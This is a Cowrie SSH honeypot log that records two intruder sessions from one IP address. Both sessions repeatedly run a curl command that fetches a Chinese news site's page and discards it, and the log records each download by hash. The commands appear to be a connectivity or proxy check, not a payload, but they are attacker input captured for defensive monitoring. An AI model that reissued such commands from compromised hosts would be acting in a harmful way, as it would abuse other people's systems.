{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.190980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.192183Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.209743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.210876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.224158Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.230395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.231598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.245262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.246579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.270795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.272071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.285819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.287063Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.315522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.316743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.330222Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.331996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.359881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.361250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.372632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.373696Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.404477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.405591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.410425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.411493Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.442444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.443628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.447445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.448582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.489838Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.491183Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.494532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.495681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.528867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.529947Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.534385Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.535488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.569712Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.570805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.574962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.575919Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.605138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.606267Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.613144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.614317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.642292Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.643690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.650063Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.651226Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.684059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.685144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.697621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.698865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.724318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.725538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.737225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.738617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.746314Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.747911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.762718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.764127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.765582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.783626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.784894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.790087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.804146Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.809711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.811112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.812093Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.830534Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.831642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.857995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.858925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.863532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.878574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.880050Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.883466Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.885970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.913794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.915293Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.920360Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.941334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.942765Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.946572Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.948719Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.960152Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:25.971483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.972540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:25.995932Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.003360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.005239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.011936Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.021095Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.022381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.027731Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.043450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.044773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.050768Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
